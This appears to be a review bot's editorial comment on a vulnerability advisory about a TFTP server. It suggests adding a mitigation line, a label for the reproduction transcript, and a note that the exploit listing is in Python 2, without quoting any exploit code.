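Review bot: The advisory records `Vendor Notification: No Reply` but gives no workaround, so a reader learns the product is exposed without learning what to do about it; a `Mitigation:` line under the disclosure timeline, such as `Keep the built-in TFTP server stopped, or restrict it to trusted networks, until a fixed build is available`, would close that gap. The `Security Issue:` section also runs the narrative straight into a console transcript; a label such as `Reproduction transcript:` before the `c:\>` lines would separate the description from the evidence. The listing under `Exploit:` is Python 2 (`print` statements, `raw_input`), which is worth stating next to the heading so readers know which interpreter the listing assumes.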